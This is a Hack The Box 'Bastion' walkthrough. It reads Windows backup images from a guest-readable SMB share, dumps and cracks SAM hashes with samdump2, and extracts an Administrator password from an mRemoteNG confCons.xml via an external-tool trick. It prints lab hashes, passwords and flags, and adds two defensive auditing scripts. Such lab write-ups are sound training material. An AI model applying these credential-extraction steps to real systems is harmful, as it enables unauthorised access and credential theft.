Bastion
Bastion Windows · Easy - Adventure mode
🔭 Reconnaissance:
┌──(pmartinezr㉿kali)-[~]
└─$ nmap -p- -sSVC bastion.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-25 20:47 CET
Nmap scan report for bastion.htb (10.129.98.120)
Host is up (0.045s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -19m59s, deviation: 34m35s, median: -1s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2026-01-25T20:49:22+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-01-25T19:49:18
|_ start_date: 2026-01-25T19:45:50
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.05 seconds
The Nmap scan shows us a handful of open ports.
┌──(pmartinezr㉿kali)-[~]
└─$ nmap --script smb-enum-shares bastion.htb -p 445
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-25 20:56 CET
Nmap scan report for bastion.htb (10.129.98.120)
Host is up (0.042s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.129.98.120\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.129.98.120\Backups:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
| Current user access: READ
| \\10.129.98.120\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.129.98.120\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: <none>
|_ Current user access: READ/WRITE
It is always a good idea to do enumeration.
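The finding that drives the rest of this box is a disk share (Backups) that a guest session can read. The script below is an added example, not part of the original writeup: it parses the `smb-enum-shares` block of an Nmap report and lists disk shares that are reachable without real credentials, which is the check a defender would run across a fleet. The sample input is a constructed copy of the share listing above; the severity logic is this example's own.

```python
import re

# Constructed sample: a trimmed copy of the smb-enum-shares block from the
# writeup's nmap output (same share names, types and access values).
SAMPLE_NMAP_OUTPUT = r"""
Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.129.98.120\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.129.98.120\Backups:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: <none>
|     Current user access: READ
|   \\10.129.98.120\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.129.98.120\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: <none>
|_    Current user access: READ/WRITE
"""

# A share header line looks like "|   \\10.129.98.120\Backups:".
SHARE_RE = re.compile(r"^\|_?\s+\\\\(?P<host>[^\\]+)\\(?P<share>[^:]+):\s*$")
# A field line looks like "|     Current user access: READ" (or "account_used: guest").
FIELD_RE = re.compile(r"^\|_?\s+(?P<key>[A-Za-z_ ]+?):\s*(?P<val>.*)$")

# Accounts Nmap reports when it got in without a real credential.
UNAUTHENTICATED_ACCOUNTS = {"guest", "<blank>"}


def parse_shares(report_text):
    """Return (account_used, {share_name: {field: value}}) from Nmap script output."""
    account = None
    shares = {}
    current = None
    for line in report_text.splitlines():
        m = SHARE_RE.match(line)
        if m:
            current = m.group("share")
            shares[current] = {}
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m.group("key").strip(), m.group("val").strip()
        if key == "account_used":
            account = val
        elif current is not None:
            shares[current][key] = val
    return account, shares


def exposed_disk_shares(account, shares):
    """Disk shares readable anonymously or by the unauthenticated account Nmap used.

    IPC$ is skipped: READ/WRITE on the IPC pipe share over a null session is the
    normal SMB behaviour and does not expose files by itself.
    """
    findings = []
    for name, info in shares.items():
        if info.get("Type", "").startswith("STYPE_IPC"):
            continue
        anon = info.get("Anonymous access", "<none>")
        current = info.get("Current user access", "<none>")
        if anon != "<none>":
            findings.append((name, anon))
        elif account in UNAUTHENTICATED_ACCOUNTS and current != "<none>":
            findings.append((name, current))
    return findings


def audit(report_text):
    """Convenience wrapper: parse a report and return the exposed disk shares."""
    return exposed_disk_shares(*parse_shares(report_text))


if __name__ == "__main__":
    for share, access in audit(SAMPLE_NMAP_OUTPUT):
        print(f"exposed disk share: {share} ({access})")
```

Run it over a saved `nmap -oN` file to get the same list for real hosts; any non-empty result is a share whose contents (here, a full Windows image backup) are readable by anyone who can reach port 445.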
┌──(pmartinezr㉿kali)-[~/htb/bastion]
└─$ smbclient -N //bastion.htb/Backups
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jan 25 20:54:09 2026
.. D 0 Sun Jan 25 20:54:09 2026
nmap-test-file A 260 Sun Jan 25 20:54:09 2026
note.txt AR 116 Tue Apr 16 12:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 13:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 13:44:02 2019
5638911 blocks of size 4096. 1175689 blocks available
smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup\> ls
. Dn 0 Fri Feb 22 13:44:02 2019
.. Dn 0 Fri Feb 22 13:44:02 2019
L4mpje-PC Dn 0 Fri Feb 22 13:45:32 2019
5638911 blocks of size 4096. 1175689 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> ls
. Dn 0 Fri Feb 22 13:45:32 2019
.. Dn 0 Fri Feb 22 13:45:32 2019
Backup 2019-02-22 124351 Dn 0 Fri Feb 22 13:45:32 2019
Catalog Dn 0 Fri Feb 22 13:45:32 2019
MediaId An 16 Fri Feb 22 13:44:02 2019
SPPMetadataCache Dn 0 Fri Feb 22 13:45:32 2019
5638911 blocks of size 4096. 1175689 blocks available
It looks like the Backups directory is accessible; clearly we should continue down this path.
┌──(pmartinezr㉿kali)-[~/htb/bastion]
└─$ cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
The note says not to transfer the backup, but the backups are where the key to many challenges lies. Treasure can be found in the "trash".
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls
. Dn 0 Fri Feb 22 13:45:32 2019
.. Dn 0 Fri Feb 22 13:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 13:44:02 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 13:44:03 2019
BackupSpecs.xml An 1186 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 13:45:32 2019
5638911 blocks of size 4096. 1175705 blocks available
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> get 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
getting file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd of size 37761024 as 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd (3438.0 KiloBytes/sec) (average 3438.0 KiloBytes/sec)
We download the two files 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd and 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd. This forced me to serve the files and mount them on another Windows PC.
┌──(pmartinezr㉿kali)-[~/htb/bastion]
└─$ samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
31d6cfe0d16ae931b73c59d7e0c089c0:
26112010952d963c8dc4217daec986d9:bureaulampje
We can then use samdump2 once we have extracted the SYSTEM and SAM files.
👽 Actions:
┌──(pmartinezr㉿kali)-[~/htb/bastion]
└─$ ssh L4mpje@bastion.htb
L4mpje@bastion.htb's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>type Desktop\user.txt
917d20037cd9522698a02167bc811246
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="
AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpa
P5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-a
ff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dma
PFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Defau
lt Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionSt
rength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="fals
Here we already have the first flag. But we have to keep looking. The vulnerability in this machine lies in the use of mRemoteNG, since this application seems to suffer from a certain weakness in how it stores credentials, and therefore, if these files were created with older versions, the password can be extracted with certain actions.
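What makes confCons.xml dangerous is visible in its own attributes: the file is not fully encrypted, every connection carries its own password blob, and one of them is for Administrator. The script below is an added example, not the writeup's or mRemoteNG's code: it audits a confCons.xml for those properties without decrypting anything, which is the check an administrator would run before letting such a file sit in a user profile. The sample XML is constructed from the attributes shown above with placeholder Protected/Password values; the second "Jump" node, the 10000-iteration threshold and the privileged-user list are this example's own assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the confCons.xml attributes shown above.
# Protected and Password are placeholders, not the file's real blobs, and the
# "Jump" node is invented to show a connection with no stored secret.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
    FullFileEncryption="false" Protected="PLACEHOLDER_PROTECTED_BLOB" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General"
      Id="00000000-0000-0000-0000-000000000001" Username="Administrator" Domain=""
      Password="PLACEHOLDER_PASSWORD_BLOB" Hostname="127.0.0.1" Protocol="RDP"
      Port="3389" UseCredSsp="true" RDPAuthenticationLevel="NoAuth" />
  <Node Name="Jump" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General"
      Id="00000000-0000-0000-0000-000000000002" Username="l4mpje" Domain=""
      Password="" Hostname="127.0.0.1" Protocol="SSH2" Port="22" />
</mrng:Connections>
"""

MIN_KDF_ITERATIONS = 10000  # this example's threshold, not an mRemoteNG setting
PRIVILEGED_USERS = {"administrator", "admin", "root"}  # example heuristic


def audit_confcons(xml_text):
    """Return (severity, message) findings for an mRemoteNG connections file."""
    # Encode first so the XML declaration's encoding attribute is honoured.
    root = ET.fromstring(xml_text.encode("utf-8"))
    findings = []

    # File-level settings live on the mrng:Connections root element.
    if root.get("FullFileEncryption", "false").lower() != "true":
        findings.append(("medium", "FullFileEncryption is off: hostnames, usernames and "
                                   "settings are readable by anyone who can open the file"))
    try:
        iterations = int(root.get("KdfIterations", "0"))
    except ValueError:
        iterations = 0
    if iterations < MIN_KDF_ITERATIONS:
        findings.append(("low", f"KdfIterations={iterations} is below {MIN_KDF_ITERATIONS}"))

    # Connection nodes are unprefixed <Node> elements under the root.
    for node in root.iter("Node"):
        if node.get("Type") != "Connection":
            continue
        name, user = node.get("Name", "?"), node.get("Username", "")
        if node.get("Password"):
            severity = "high" if user.lower() in PRIVILEGED_USERS else "medium"
            findings.append((severity, f"connection '{name}' stores a password for '{user}'"))
        if node.get("Protocol") == "RDP" and node.get("RDPAuthenticationLevel") == "NoAuth":
            findings.append(("low", f"connection '{name}' does not authenticate the RDP server"))
    return findings


def highest_severity(findings):
    """Collapse a findings list to its worst severity for a quick pass/fail."""
    order = {"low": 1, "medium": 2, "high": 3}
    return max((sev for sev, _ in findings), key=order.get, default=None)


if __name__ == "__main__":
    results = audit_confcons(SAMPLE_CONFCONS)
    for sev, msg in results:
        print(f"[{sev}] {msg}")
    print("worst:", highest_severity(results))
```

Any "high" finding means a privileged credential is protected only by the tool's master password; the fix is to remove the stored password from the connection (or move it to a credential manager) rather than to rely on the file being hard to read.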
┌──(pmartinezr㉿kali)-[~/htb/bastion]
└─$ scp l4mpje@bastion.htb:"C:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml" .
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
l4mpje@bastion.htb's password:
confCons.xml
I download the confCons.xml file with scp.
After this we have to import this file into the mRemoteNG client and then, under External Tools, do the following: we create an external tool whose filename is `cmd.exe` and whose argument is `/k echo "password %password%"`. Now we select DC (which is the Administrator connection) and, from the menu, pick the tool we just created. It will show us the following: password thXLHM96BeKL0ER2
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
00021eb062a910c253dd7da308911335
Now we use the password to connect as `administrator`. What I learned from this machine is that we should look at which applications are used on the system and try to find out their weaknesses.